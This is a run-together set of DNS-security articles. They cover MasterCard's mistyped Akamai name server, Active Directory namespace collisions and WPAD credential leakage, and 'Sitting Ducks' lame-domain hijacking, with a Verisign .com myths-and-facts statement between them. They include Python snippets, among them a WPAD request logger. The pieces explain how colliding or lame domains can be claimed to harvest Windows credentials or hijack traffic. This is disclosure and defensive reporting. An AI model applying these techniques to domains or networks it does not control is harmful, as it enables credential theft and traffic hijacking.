The payment card giant MasterCard just fixed a glaring error in its domain name server settings that could have allowed anyone to intercept or divert Internet traffic for the company by registering an unused domain name. The misconfiguration persisted for nearly five years until a security researcher spent $300 to register the domain and prevent it from being grabbed by cybercriminals.
A DNS lookup on the domain az.mastercard.com on Jan. 14, 2025 shows the mistyped domain name a22-65.akam.ne.
From June 30, 2020 until January 14, 2025, one of the core Internet servers that MasterCard uses to direct traffic for portions of the mastercard.com network was misnamed. MasterCard.com relies on five shared Domain Name System (DNS) servers at the Internet infrastructure provider Akamai [DNS acts as a kind of Internet phone book, by translating website names to numeric Internet addresses that are easier for computers to manage].
All of the Akamai DNS server names that MasterCard uses are supposed to end in “akam.net” but one of them was misconfigured to rely on the domain “akam.ne.”
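For readers who want to check their own zones for this class of typo, here is a minimal sketch using the dnspython library; the zone name and the expected Akamai suffix are assumptions you would swap for your own environment.

```python
# Minimal sketch (assumes dnspython is installed: pip install dnspython):
# list a zone's delegated name servers and flag any that don't end in the
# suffix you expect, e.g. "akam.net." for Akamai-hosted DNS.
import dns.resolver

EXPECTED_SUFFIX = "akam.net."   # assumed suffix; adjust for your DNS provider

def check_ns(zone):
    for record in dns.resolver.resolve(zone, "NS"):
        ns = record.target.to_text()        # e.g. "a22-65.akam.net."
        status = "ok" if ns.lower().endswith(EXPECTED_SUFFIX) else "SUSPECT"
        print(f"{zone}: {ns} [{status}]")

check_ns("az.mastercard.com")
```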
This tiny but potentially critical typo was discovered recently by Philippe Caturegli, founder of the security consultancy Seralys. Caturegli said he guessed that nobody had yet registered the domain akam.ne, which is under the purview of the top-level domain authority for the West African nation of Niger.
Caturegli said it took $300 and nearly three months of waiting to secure the domain with the registry in Niger. After enabling a DNS server on akam.ne, he noticed hundreds of thousands of DNS requests hitting his server each day from locations around the globe. Apparently, MasterCard wasn’t the only organization that had fat-fingered a DNS entry to include “akam.ne,” but they were by far the largest.
Had he enabled an email server on his new domain akam.ne, Caturegli likely would have received wayward emails directed toward mastercard.com or other affected domains. If he’d abused his access, he probably could have obtained website encryption certificates (SSL/TLS certs) that were authorized to accept and relay web traffic for affected websites. He may even have been able to passively receive Microsoft Windows authentication credentials from employee computers at affected companies.
But the researcher said he didn’t attempt to do any of that. Instead, he alerted MasterCard that the domain was theirs if they wanted it, copying this author on his notifications. A few hours later, MasterCard acknowledged the mistake, but said there was never any real threat to the security of its operations.
“We have looked into the matter and there was not a risk to our systems,” a MasterCard spokesperson wrote. “This typo has now been corrected.”
Meanwhile, Caturegli received a request submitted through Bugcrowd, a program that offers financial rewards and recognition to security researchers who find flaws and work privately with the affected vendor to fix them. The message suggested his public disclosure of the MasterCard DNS error via a post on LinkedIn (after he’d secured the akam.ne domain) was not aligned with ethical security practices, and passed on a request from MasterCard to have the post removed.
MasterCard’s request to Caturegli, a.k.a. “Titon” on infosec.exchange.
Caturegli said while he does have an account on Bugcrowd, he has never submitted anything through the Bugcrowd program, and that he reported this issue directly to MasterCard.
“I did not disclose this issue through Bugcrowd,” Caturegli wrote in reply. “Before making any public disclosure, I ensured that the affected domain was registered to prevent exploitation, mitigating any risk to MasterCard or its customers. This action, which we took at our own expense, demonstrates our commitment to ethical security practices and responsible disclosure.”
Most organizations have at least two authoritative domain name servers, but some handle so many DNS requests that they need to spread the load over additional DNS server domains. In MasterCard’s case, that number is five, so it stands to reason that if an attacker managed to seize control over just one of those domains they would only be able to see about one-fifth of the overall DNS requests coming in.
But Caturegli said the reality is that many Internet users are relying at least to some degree on public traffic forwarders or DNS resolvers like Cloudflare and Google.
“So all we need is for one of these resolvers to query our name server and cache the result,” Caturegli said. By setting their DNS server records with a long TTL or “Time To Live” — a value that tells resolvers how long to cache a DNS answer before asking again — an attacker’s poisoned instructions for the target domain can be propagated by large cloud providers.
“With a long TTL, we may reroute a LOT more than just 1/5 of the traffic,” he said.
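To see the caching dynamic Caturegli is describing, a small experiment with dnspython against a public resolver is enough; the resolver address and query name below are just examples.

```python
# Query a shared public resolver twice and watch the cached TTL tick down.
# The longer the TTL the authoritative server sets, the longer its answer
# lives inside resolvers like this one, for every client that uses them.
import time
import dns.resolver

resolver = dns.resolver.Resolver(configure=False)
resolver.nameservers = ["8.8.8.8"]            # example public resolver

first = resolver.resolve("example.com", "NS")
time.sleep(5)
second = resolver.resolve("example.com", "NS")

print("TTL on first answer :", first.rrset.ttl)
print("TTL five seconds on :", second.rrset.ttl)   # lower if served from cache
```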
The researcher said he’d hoped that the credit card giant might thank him, or at least offer to cover the cost of buying the domain.
“We obviously disagree with this assessment,” Caturegli wrote in a follow-up post on LinkedIn regarding MasterCard’s public statement. “But we’ll let you judge— here are some of the DNS lookups we recorded before reporting the issue.”
Caturegli posted this screenshot of MasterCard domains that were potentially at risk from the misconfigured domain.
As the screenshot above shows, the misconfigured DNS server Caturegli found involved the MasterCard subdomain az.mastercard.com. It is not clear exactly how this subdomain is used by MasterCard, but the naming convention suggests the domains correspond to production servers at Microsoft’s Azure cloud service. Caturegli said the domains all resolve to Internet addresses at Microsoft.
“Don’t be like Mastercard,” Caturegli concluded in his LinkedIn post. “Don’t dismiss risk, and don’t let your marketing team handle security disclosures.”
One final note: The domain akam.ne has been registered previously — in December 2016 by someone using the email address um-i-delo@yandex.ru. The Russian search giant Yandex reports this user account belongs to an “Ivan I.” from Moscow. Passive DNS records from DomainTools.com show that between 2016 and 2018 the domain was connected to an Internet server in Germany, and that the domain was left to expire in 2018.
This is interesting given a comment on Caturegli’s LinkedIn post from an ex-Cloudflare employee who linked to a report he co-authored on a similar typo domain apparently registered in 2017 for organizations that may have mistyped their AWS DNS server as “awsdns-06.ne” instead of “awsdns-06.net.” DomainTools reports that this typo domain also was registered to a Yandex user (playlotto@yandex.ru), and was hosted at the same German ISP — Team Internet (AS61969).
The proliferation of new top-level domains (TLDs) has exacerbated a well-known security weakness: Many organizations set up their internal Microsoft authentication systems years ago using domain names in TLDs that didn’t exist at the time. Meaning, they are continuously sending their Windows usernames and passwords to domain names they do not control and which are freely available for anyone to register. Here’s a look at one security researcher’s efforts to map and shrink the size of this insidious problem.
At issue is a well-known security and privacy threat called “namespace collision,” a situation where domain names intended to be used exclusively on an internal company network end up overlapping with domains that can resolve normally on the open Internet.
Windows computers on a private corporate network locate and authenticate to other resources on that network using a Microsoft technology called Active Directory, which is the umbrella term for a broad range of identity-related services in Windows environments. A core part of the way these systems find each other involves a Windows feature called “DNS name devolution,” a kind of network shorthand that makes it easier to find other computers or servers without having to specify a full, legitimate domain name for those resources.
Consider the hypothetical private network internalnetwork.example.com: When an employee on this network wishes to access a shared drive called “drive1,” there’s no need to type “drive1.internalnetwork.example.com” into Windows Explorer; entering “\\drive1\” alone will suffice, and Windows takes care of the rest.
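A rough sketch of what devolution does under the hood, written in Python for illustration only; the logic is simplified, and real Windows behavior also depends on the client's DNS suffix search list and configured devolution level.

```python
def devolution_candidates(short_name, primary_suffix, devolution_level=2):
    """Return the fully qualified names a Windows client may try, in order,
    for a single-label name. Simplified for illustration."""
    labels = primary_suffix.split(".")
    candidates = []
    while len(labels) >= devolution_level:
        candidates.append(f"{short_name}.{'.'.join(labels)}")
        labels = labels[1:]      # strip the leftmost label and try again
    return candidates

# ['drive1.internalnetwork.example.com', 'drive1.example.com']
print(devolution_candidates("drive1", "internalnetwork.example.com"))
```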
But problems can arise when an organization has built their Active Directory network on top of a domain they don’t own or control. While that may sound like a bonkers way to design a corporate authentication system, keep in mind that many organizations built their networks long before the introduction of hundreds of new top-level domains (TLDs), like .network, .inc, and .llc.
For example, a company in 2005 builds its Microsoft Active Directory service around the domain company.llc, perhaps reasoning that since .llc wasn’t even a routable TLD at the time, the domain would simply fail to resolve if the organization’s Windows computers were ever used outside of its local network.
Alas, in 2018, the .llc TLD was born and began selling domains. From then on, anyone who registered company.llc would be able to passively intercept that organization’s Microsoft Windows credentials, or actively modify those connections in some way — such as redirecting them somewhere malicious.
Philippe Caturegli, founder of the security consultancy Seralys, is one of several researchers seeking to chart the size of the namespace collision problem. As a professional penetration tester, Caturegli has long exploited these collisions to attack specific targets that were paying to have their cyber defenses probed. But over the past year, Caturegli has been gradually mapping this vulnerability across the Internet by looking for clues that appear in self-signed security certificates (e.g. SSL/TLS certs).
Caturegli has been scanning the open Internet for self-signed certificates referencing domains in a variety of TLDs likely to appeal to businesses, including .ad, .associates, .center, .cloud, .consulting, .dev, .digital, .domains, .email, .global, .gmbh, .group, .holdings, .host, .inc, .institute, .international, .it, .llc, .ltd, .management, .ms, .name, .network, .security, .services, .site, .srl, .support, .systems, .tech, .university, .win and .zone, among others.
Seralys found certificates referencing more than 9,000 distinct domains across those TLDs. Their analysis determined that some TLDs had far more exposed domains than others, and that about 20 percent of the domains they found ending in .ad, .cloud and .group remain unregistered.
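The second half of that pipeline — checking whether a domain gleaned from a certificate is still unregistered — can be approximated with a simple NS lookup; a sketch using dnspython follows. The candidate domains are hypothetical, and NXDOMAIN only suggests a name is unclaimed (a registered but undelegated domain looks the same), so a registry or RDAP lookup remains the authoritative test.

```python
# Rough triage of candidate domains harvested from certificates: an NXDOMAIN
# answer for the registrable name hints that nobody has registered (and
# delegated) it yet.
import dns.resolver

candidates = ["corp.ad", "internal.cloud", "fileserver.group"]   # hypothetical examples

for domain in candidates:
    try:
        dns.resolver.resolve(domain, "NS")
        print(f"{domain}: delegated (registered)")
    except dns.resolver.NXDOMAIN:
        print(f"{domain}: NXDOMAIN, possibly unregistered, verify via RDAP/registry")
    except (dns.resolver.NoAnswer, dns.resolver.NoNameservers, dns.resolver.LifetimeTimeout):
        print(f"{domain}: exists but delegation looks broken")
```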
“The scale of the issue seems bigger than I initially anticipated,” Caturegli said in an interview with KrebsOnSecurity. “And while doing my research, I have also identified government entities (foreign and domestic), critical infrastructures, etc. that have such misconfigured assets.”
Some of the above-listed TLDs are not new and correspond to country-code TLDs, like .it for Italy, and .ad, the country-code TLD for the tiny nation of Andorra. Caturegli said many organizations no doubt viewed a domain ending in .ad as a convenient shorthand for an internal Active Directory setup, while being unaware or unworried that someone could actually register such a domain and intercept all of their Windows credentials and any unencrypted traffic.
When Caturegli discovered an encryption certificate being actively used for the domain memrtcc.ad, the domain was still available for registration. He then learned the .ad registry requires prospective customers to show a valid trademark for a domain before it can be registered.
Undeterred, Caturegli found a domain registrar that would sell him the domain for $160, and handle the trademark registration for another $500 (on subsequent .ad registrations, he located a company in Andorra that could process the trademark application for half that amount).
Caturegli said that immediately after setting up a DNS server for memrtcc.ad, he began receiving a flood of communications from hundreds of Microsoft Windows computers trying to authenticate to the domain. Each request contained a username and a hashed Windows password, and upon searching the usernames online Caturegli concluded they all belonged to police officers in Memphis, Tenn.
“It looks like all of the police cars there have a laptop in the cars, and they’re all attached to this memrtcc.ad domain that I now own,” Caturegli said, noting wryly that “memrtcc” stands for “Memphis Real-Time Crime Center.”
Caturegli said setting up an email server record for memrtcc.ad caused him to begin receiving automated messages from the police department’s IT help desk, including trouble tickets regarding the city’s Okta authentication system.
Mike Barlow, information security manager for the City of Memphis, confirmed the Memphis Police’s systems were sharing their Microsoft Windows credentials with the domain, and that the city was working with Caturegli to have the domain transferred to them.
“We are working with the Memphis Police Department to at least somewhat mitigate the issue in the meantime,” Barlow said.
Domain administrators have long been encouraged to use .local for internal domain names, because this TLD is reserved for use by local networks and cannot be routed over the open Internet. However, Caturegli said many organizations seem to have missed that memo and gotten things backwards — setting up their internal Active Directory structure around the perfectly routable domain local.ad.
Caturegli said he knows this because he “defensively” registered local.ad, which he said is currently used by multiple large organizations for Active Directory setups — including a European mobile phone provider, and the City of Newcastle in the United Kingdom.
Caturegli said he has now defensively registered a number of domains ending in .ad, such as internal.ad and schema.ad. But perhaps the most dangerous domain in his stable is wpad.ad. WPAD stands for Web Proxy Auto-Discovery Protocol, which is an ancient, on-by-default feature built into every version of Microsoft Windows that was designed to make it simpler for Windows computers to automatically find and download any proxy settings required by the local network.
Trouble is, any organization that chose a .ad domain they don’t own for their Active Directory setup will have a whole bunch of Microsoft systems constantly trying to reach out to wpad.ad if those machines have automatic proxy detection enabled.
Security researchers have been beating up on WPAD for more than two decades now, warning time and again how it can be abused for nefarious ends. At this year’s DEF CON security conference in Las Vegas, for example, a researcher showed what happened after they registered the domain wpad.dk: Immediately after switching on the domain, they received a flood of WPAD requests from Microsoft Windows systems in Denmark that had namespace collisions in their Active Directory environments.
Image: Defcon.org.
For his part, Caturegli set up a server on wpad.ad to resolve and record the Internet address of any Windows systems trying to reach Microsoft SharePoint servers, and saw that over one week it received more than 140,000 hits from hosts around the world attempting to connect.
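For researchers who control a colliding domain, a passive listener of this kind can be as simple as a web server that logs who asks for the WPAD file and hands back a do-nothing proxy script. The sketch below is illustrative only, not Caturegli's actual setup, and should only ever be run on domains you own.

```python
# Log WPAD requests and return a PAC file that proxies nothing ("DIRECT"),
# so no client traffic is actually intercepted. Requires privileges to bind port 80.
from http.server import BaseHTTPRequestHandler, HTTPServer

PAC = b'function FindProxyForURL(url, host) { return "DIRECT"; }\n'

class WpadLogger(BaseHTTPRequestHandler):
    def do_GET(self):
        if self.path.lower() == "/wpad.dat":
            print(f"WPAD request from {self.client_address[0]} "
                  f"({self.headers.get('User-Agent')})")
            self.send_response(200)
            self.send_header("Content-Type", "application/x-ns-proxy-autoconfig")
            self.end_headers()
            self.wfile.write(PAC)
        else:
            self.send_response(404)
            self.end_headers()

HTTPServer(("0.0.0.0", 80), WpadLogger).serve_forever()
```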
The fundamental problem with WPAD is the same as with Active Directory: Both are technologies originally designed to be used in closed, static, trusted office environments, and neither was built with today’s mobile devices or workforce in mind.
Probably one big reason organizations with potential namespace collision problems don’t fix them is that rebuilding one’s Active Directory infrastructure around a new domain name can be incredibly disruptive, costly, and risky, while the potential threat is considered comparatively low.
But Caturegli said ransomware gangs and other cybercrime groups could siphon huge volumes of Microsoft Windows credentials from quite a few companies with just a small up-front investment.
“It’s an easy way to gain that initial access without even having to launch an actual attack,” he said. “You just wait for the misconfigured workstation to connect to you and send you their credentials.”
If we ever learn that cybercrime groups are using namespace collisions to launch ransomware attacks, nobody can say they weren’t warned. Mike O’Connor, an early domain name investor who registered a number of choice domains such as bar.com, place.com and television.com, warned loudly and often back in 2013 that then-pending plans to add more than 1,000 new TLDs would massively expand the number of namespace collisions.
Mr. O’Connor’s most famous domain is corp.com, because for several decades he watched in horror as hundreds of thousands of Microsoft PCs continuously blasted his domain with credentials from organizations that had set up their Active Directory environment around the domain corp.com.
It turned out that Microsoft had actually used corp.com as an example of how one might set up Active Directory in some editions of Windows NT. Worse, some of the traffic going to corp.com was coming from Microsoft’s internal networks, indicating some part of Microsoft’s own internal infrastructure was misconfigured. When O’Connor said he was ready to sell corp.com to the highest bidder in 2020, Microsoft agreed to buy the domain for an undisclosed amount.
“I kind of imagine this problem to be something like a town [that] knowingly built a water supply out of lead pipes, or vendors of those projects who knew but didn’t tell their customers,” O’Connor told KrebsOnSecurity. “This is not an inadvertent thing like Y2K where everybody was surprised by what happened. People knew and didn’t care.”
Over the past several weeks, there has been significant discussion about Verisign and its management of the .com top-level domain (TLD) registry. Much of this discussion has been distorted by factual inaccuracies, a misunderstanding of core technical concepts, and misinterpretations regarding pricing, competition, and market dynamics in the domain name industry.
Billions of internet users and trillions of dollars in global commerce rely on the continuing security, stability, and resiliency of the .com TLD and the technical infrastructure that powers it, so it is vital that discussions about this topic be rooted in fact.
To set the record straight, we have collected and addressed the most common myths currently circulating about the .com TLD.
Myth: The technology that powers the .com TLD is not sophisticated.
Fact: Verisign has invested continuously for decades to build and evolve the infrastructure that powers the .com TLD, which is the most technically sophisticated of its kind. This infrastructure includes an advanced registration system, which reliably updates and maintains an accurate record of all registered .com domain names on a continuous basis, ensuring that millions of registry transactions are processed correctly, and millions of daily changes – including cryptographic updates to support Domain Name System Security Extensions (DNSSEC) – are distributed to a highly resilient global resolution constellation within seconds. This system ensures that users around the world maintain continuous, round-the-clock access to .com domain names and all the resources and services they support. Verisign has also played a vital role in the development and deployment of DNSSEC technology which uses cryptographic protections to ensure those connections are delivered with reliability and trust.
Verisign’s infrastructure processes an average of 329 billion Domain Name System (DNS) transactions each day, operating at a peak of more than six million transactions per second so far this year. Verisign’s resolution infrastructure is engineered to handle peak query loads significantly greater than the highest ever observed, to ensure continuous operation regardless of demand. This infrastructure has delivered 100 percent DNS availability for .com for more than 27 years without interruption. Verisign accomplishes this by operating a large, globally distributed registry operation, made up of hundreds of technical sites spread across 60+ nations on six continents. These sites run purpose-built technology invented by Verisign technologists for the unique demands of the .com TLD. Verisign engineers have developed specialized technologies and protocols that are designed to achieve higher availability and resiliency to prevent disruption. Examples of this design include employing network, system, and application-level diversification approaches such as using hardware from multiple vendors for network and data center operations and using multiple operating system providers to better withstand localized failures or single-threaded supplier issues. Using in-house purpose-built systems, as opposed to leveraging public cloud operations, lowers the risks of circular dependencies as most public cloud providers also rely on .com and the root infrastructure operated by Verisign. These approaches ensure diversity and redundancy for every component of .com operations.
Verisign is also tasked with defending against highly sophisticated and massive volumetric cyberattacks while managing ever-increasing global demand. Trillions of dollars in global commerce and billions of internet users depend on the availability of Verisign infrastructure 24/7. To defend .com against cyberattacks, including by highly sophisticated nation-state actors, Verisign employs a comprehensive enterprise risk management program and threat-driven defensive practices that drive continuous improvements to Verisign’s systems and programs. Verisign has operationalized the National Institute of Standards and Technology’s (NIST) Cybersecurity Framework and the Center for Internet Security’s (CIS) Critical Security Controls in the ongoing design and evolution of its infrastructure, with a security-first mindset. In addition, Verisign employs advanced information security measures such as continuous monitoring, real-time threat detection, ongoing vulnerability assessments, bug bounty programs, and rigorous security audits to safeguard its infrastructure.
Verisign’s infrastructure powers more than just .com. In addition to operating other TLDs, Verisign plays a unique role as Root Zone Maintainer and operator of two of the world’s 13 root servers, a critical function necessary for internet navigation. Hundreds of Verisign employees have developed highly specialized skills, honed over decades, to develop, maintain, and operate this unique global infrastructure. Verisign holds more than 500 patents for DNS and related technologies, and its innovations are deployed globally by other critical internet infrastructure operators. Verisign has made many of its critical DNS patents available on a royalty-free basis to the global DNS community and those technologies have been deployed around the world.
Myth: The annual wholesale price for .com domain names – $10.26 as of Sept. 1 – is much higher than market value and is harming consumers.
Fact: While other generic TLDs (gTLDs) do not share .com’s pricing transparency, the annual wholesale renewal price of a .com domain name is lower than 87 percent of the 448 gTLDs for which such data is available from registrars. Based on that data, some of the largest original gTLDs, which have been in the market for over 20 years, have renewal pricing of $9.93 (.org), $15.00 (.biz), and $17.50 (.info). Some of the largest new gTLDs, which have been in the market for over 10 years, have renewal pricing of $10 (.xyz – increasing to $11 by the end of September), $25.00 (.online), and $40.00 (.store). The available market data makes it clear that .com domain names are priced at or below market value. It is notable that competing TLDs have continued to grow market share while pricing their domain names over twice as high as .com domain names.
Customers of .com domain names are more likely to be affected by two factors outside of Verisign’s control: 1) the rising cost of retail registrations that are outpacing wholesale prices, with some registrars now charging more than double the wholesale price to renew a .com domain name; and 2) the unregulated secondary market, which accumulates large inventories of domain names and charges markups that are – in some cases – thousands of times higher than the regulated wholesale price.
Myth: Verisign spends an unusual amount on share repurchases and dividends at the expense of infrastructure investment.
Fact: Verisign’s technological infrastructure is unmatched in the DNS industry for its scale, technical diversity, security, and resiliency. Verisign has invested for years to evolve and harden that technology, a fact illustrated by the company’s 27-year DNS uptime record. During the 2000s, Verisign offered a number of DNS-related services, including distributed denial-of-service (DDoS) attack mitigation and managed DNS. Significant capacity was added during that period. In 2018, when Verisign divested the last of its non-core businesses to focus on .com and other DNS operations, the company not only maintained, but increased capacity in order to meet growing DNS demand as well as to address growing DDoS volumetric attacks.
Verisign is certainly a profitable company and is proud of its operational success and history of sound financial management, which are important factors in maintaining the security, stability, and resiliency of the DNS. Some critics have singled out Verisign’s methods of increasing shareholder value, a duty of all public companies. Verisign has fulfilled this duty in part through share repurchases and dividends, which benefit a large and diverse group of shareholders including individuals, public employee retirement systems, index funds, and mutual funds (benefiting their millions of investors). Less than one percent of Verisign’s shares are held by company officers and directors.
Verisign’s return of capital practices are well in line with those of other successful public companies. In 2023, more than 90 percent of S&P 500 companies returned capital to shareholders and Verisign ranked 216th out of the S&P 500 in terms of cash returned to shareholders as a percentage of market capitalization. In terms of profitability, market expectation of Verisign’s earnings per share (a reliable measure of profitability) is $8.36 for the next 12 months, which places it 198th in the S&P 500.
Verisign’s sound and transparent financial management underpins its successful management of the .com TLD and other key internet infrastructure. Verisign has been a public company for 26 years and an S&P 500 company for 18 years. As a publicly listed company operating critical internet infrastructure, the public and the DNS ecosystem benefit from Verisign’s transparency in its operating and financial results, which must comply with the SEC’s disclosure rules and regulations for public companies. Verisign’s financial statements must also undergo an independent audit each year. By contrast, many other registries, registrars, and resellers, including some who focus on the secondary market, serve only the narrow interests of their private owners and do so with no obligations surrounding public disclosure or transparency of their ownership, profitability, operations, or otherwise. Adding obligations for these entities to report ownership, profitability, and other metrics to The Internet Corporation for Assigned Names and Numbers (ICANN) and the public would benefit the entire DNS ecosystem.
Myth: Contracts to operate gTLD registries should be routinely rebid, and a presumptive right of renewal for such contracts is bad for consumers and the internet.
Fact: The National Telecommunications and Information Administration (NTIA) recently opined that “The security, stability, and resilience of the Internet’s unique identifier systems is of paramount importance…” This position is shared by Verisign and the majority of participants in the global multistakeholder system of internet governance. ICANN has supported and clarified this priority and the role it plays in registry contracts. The contracts for .com and all other gTLDs reflect this priority (i.e., that stability and predictability in registry operations leads to long-term investments by operators). Verisign’s right to renew its .com Registry Agreement is conditioned on meeting rigorous technical and operational requirements to ensure .com’s continued security, stability, and continuous availability to billions of internet users. This contractual approach encourages gTLD operators to invest in infrastructure to support rising demand and defend against cyberattacks. Due to its investments, Verisign has operated .com with 100 percent DNS uptime for over 27 years.
Myth: Verisign’s operation of .com constitutes a “monopoly.”
Fact: There are nearly 1,200 gTLDs, and more than 250 country-code TLDs (ccTLDs), operating today. Each of these TLDs offers the same core functionality, allowing users to establish and maintain an online presence, build websites, and create email addresses. Globally, there are over 362 million registered domain names – the majority of which are registered in TLDs not operated by Verisign. The number of domain names registered in non-Verisign operated gTLDs and ccTLDs has grown consistently as those TLDs have grown their share of the marketplace. In addition to this competition at the wholesale level, there are more than 2,800 ICANN-accredited registrars, and thousands more resellers, offering domain names at a range of prices and in a range of packages to consumers.
Further, from a practical perspective, the technical nature of TLD registries requires that they each be run by a single operator, but with so many operators in the marketplace, consumers have a broad and diverse array of choices at a range of prices. Other TLDs like .org, .shop, .ai, and .uk are not “monopolies” and neither is .com.
Myth: Verisign sets .com domain name prices for consumers.
Fact: Domain name registrars set unregulated retail prices for .com domain names, and those prices vary widely among the 2,800 ICANN-accredited registrars and associated resellers. Some registrars charge more than double the annual wholesale price for .com domain name renewals, and, in many cases, those price increases have outpaced Verisign’s tightly regulated .com wholesale price increases. In analyzing registrar pricing, it is important to distinguish introductory offers – which are often set lower to attract new customers – from renewal prices, which is what registrars charge existing customers to maintain their domain name registrations.
In addition to the retail registrar market, there is also a multibillion-dollar secondary market for domain names, in which domain investors, or “domainers,” accumulate millions of desirable domain names in order to resell them at markups that can be thousands of times higher than Verisign’s regulated wholesale prices. The gap between wholesale prices and secondary market prices makes it possible for domainers to hold names for years – making them prohibitively expensive to the general public. The profitability of the secondary market has also attracted successful retail registrars to expand into it, acquiring large portfolios of .com domain names and creating auction sites where they are sold well above retail prices. A blog that reports on high-profile domain name sales reported that just one reselling site handled $90 million in secondary sales in the second quarter of 2024 alone. Although the secondary marketplace may serve a function within the DNS ecosystem, it is completely unregulated.
Myth: The U.S. Government lifted price caps on .com domain names in 2018.
Fact: Amendment 35 to the Cooperative Agreement retained wholesale price restrictions in the .com TLD, while also retaining legacy regulations prohibiting Verisign from operating as a registrar in the .com TLD. Of the nearly 1,200 gTLDs overseen by ICANN and the global multistakeholder community, .com, .net, and .name (also operated by Verisign) remain the only three that are governed by maximum price restrictions. Those restrictions remain in place today and will remain in place after the .com Registry Agreement is renewed later this year.
More than a million domain names — including many registered by Fortune 100 firms and brand protection companies — are vulnerable to takeover by cybercriminals thanks to authentication weaknesses at a number of large web hosting providers and domain registrars, new research finds.
Image: Shutterstock.
Your Web browser knows how to find a site like example.com thanks to the global Domain Name System (DNS), which serves as a kind of phone book for the Internet by translating human-friendly website names (example.com) into numeric Internet addresses.
When someone registers a domain name, the registrar will typically provide two sets of DNS records that the customer then needs to assign to their domain. Those records are crucial because they allow Web browsers to find the Internet address of the hosting provider that is serving that domain.
But potential problems can arise when a domain’s DNS records are “lame,” meaning the authoritative name server does not have enough information about the domain and can’t resolve queries to find it. A domain can become lame in a variety of ways, such as when it is not assigned an Internet address, or because the name servers in the domain’s authoritative record are misconfigured or missing.
The reason lame domains are problematic is that a number of Web hosting and DNS providers allow users to claim control over a domain without accessing the true owner’s account at their DNS provider or registrar.
If this threat sounds familiar, that’s because it is hardly new. Back in 2019, KrebsOnSecurity wrote about thieves employing this method to seize control over thousands of domains registered at GoDaddy, and using those to send bomb threats and sextortion emails (GoDaddy says they fixed that weakness in their systems not long after that 2019 story).
In the 2019 campaign, the spammers created accounts on GoDaddy and were able to take over vulnerable domains simply by registering a free account at GoDaddy and being assigned the same DNS servers as the hijacked domain.
Three years before that, the same pervasive weakness was described in a blog post by security researcher Matthew Bryant, who showed how one could commandeer at least 120,000 domains via DNS weaknesses at some of the world’s largest hosting providers.
Incredibly, new research jointly released today by security experts at Infoblox and Eclypsium finds this same authentication weakness is still present at a number of large hosting and DNS providers.
“It’s easy to exploit, very hard to detect, and it’s entirely preventable,” said Dave Mitchell, principal threat researcher at Infoblox. “Free services make it easier [to exploit] at scale. And the bulk of these are at a handful of DNS providers.”
Infoblox’s report found there are multiple cybercriminal groups abusing these stolen domains as a globally dispersed “traffic distribution system,” which can be used to mask the true source or destination of web traffic and to funnel Web users to malicious or phishing websites.
Commandeering domains this way also can allow thieves to impersonate trusted brands and abuse their positive or at least neutral reputation when sending email from those domains, as we saw in 2019 with the GoDaddy attacks.
“Hijacked domains have been used directly in phishing attacks and scams, as well as large spam systems,” reads the Infoblox report, which refers to lame domains as “Sitting Ducks.” “There is evidence that some domains were used for Cobalt Strike and other malware command and control (C2). Other attacks have used hijacked domains in targeted phishing attacks by creating lookalike subdomains. A few actors have stockpiled hijacked domains for an unknown purpose.”
Eclypsium researchers estimate there are currently about one million Sitting Duck domains, and that at least 30,000 of them have been hijacked for malicious use since 2019.
“As of the time of writing, numerous DNS providers enable this through weak or nonexistent verification of domain ownership for a given account,” Eclypsium wrote.
The security firms said they found a number of compromised Sitting Duck domains were originally registered by brand protection companies that specialize in defensive domain registrations (reserving look-alike domains for top brands before those names can be grabbed by scammers) and combating trademark infringement.
For example, Infoblox found cybercriminal groups using a Sitting Duck domain called clickermediacorp[.]com, which was a CBS Interactive Inc. domain initially registered in 2009 at GoDaddy. However, in 2010 the DNS was updated to DNSMadeEasy.com servers, and in 2012 the domain was transferred to MarkMonitor.
Another hijacked Sitting Duck domain — anti-phishing[.]org — was registered in 2003 by the Anti-Phishing Working Group (APWG), a cybersecurity not-for-profit organization that closely tracks phishing attacks.
In many cases, the researchers discovered Sitting Duck domains that appear to have been configured to auto-renew at the registrar, but the authoritative DNS or hosting services were not renewed.
The researchers say Sitting Duck domains all possess three attributes that make them vulnerable to takeover (a rough check for the second attribute is sketched below the list):
1) the domain uses or delegates authoritative DNS services to a different provider than the domain registrar;
2) the authoritative name server(s) for the domain does not have information about the Internet address the domain should point to;
3) the authoritative DNS provider is “exploitable,” i.e. an attacker can claim the domain at the provider and set up DNS records without access to the valid domain owner’s account at the domain registrar.
Image: Infoblox.
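A rough way to test the second attribute for a domain you are responsible for: query each delegated name server directly and see whether it actually answers for the zone. This sketch uses dnspython; the name server hostname shown is a placeholder.

```python
# Flag "lame" name servers: servers listed in the delegation that answer
# REFUSED or SERVFAIL when asked about the zone they supposedly serve.
import dns.message
import dns.query
import dns.rcode
import dns.resolver

def lame_servers(domain, ns_hosts):
    lame = []
    for ns in ns_hosts:
        ns_ip = dns.resolver.resolve(ns, "A")[0].to_text()
        reply = dns.query.udp(dns.message.make_query(domain, "SOA"), ns_ip, timeout=5)
        rcode = dns.rcode.to_text(reply.rcode())
        if rcode in ("REFUSED", "SERVFAIL"):
            lame.append((ns, rcode))
    return lame

# ns_hosts would normally be copied from the registrar's delegation records.
print(lame_servers("example.com", ["ns1.dns-provider.example"]))   # placeholder host
```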
How does one know whether a DNS provider is exploitable? There is a frequently updated list published on GitHub called “Can I take over DNS,” which has been documenting exploitability by DNS provider over the past several years. The list includes examples for each of the named DNS providers.
In the case of the aforementioned Sitting Duck domain clickermediacorp[.]com, the domain appears to have been hijacked by scammers by claiming it at the web hosting firm DNSMadeEasy, which is owned by Digicert, one of the industry’s largest issuers of digital certificates (SSL/TLS certificates).
In an interview with KrebsOnSecurity, DNSMadeEasy founder and senior vice president Steve Job said the problem isn’t really his company’s to solve, noting that DNS providers who are also not domain registrars have no real way of validating whether a given customer legitimately owns the domain being claimed.
“We do shut down abusive accounts when we find them,” Job said. “But it’s my belief that the onus needs to be on the [domain registrants] themselves. If you’re going to buy something and point it somewhere you have no control over, we can’t prevent that.”
Infoblox, Eclypsium, and the DNS wiki listing at Github all say that web hosting giant Digital Ocean is among the vulnerable hosting firms. In response to questions, Digital Ocean said it was exploring options for mitigating such activity.
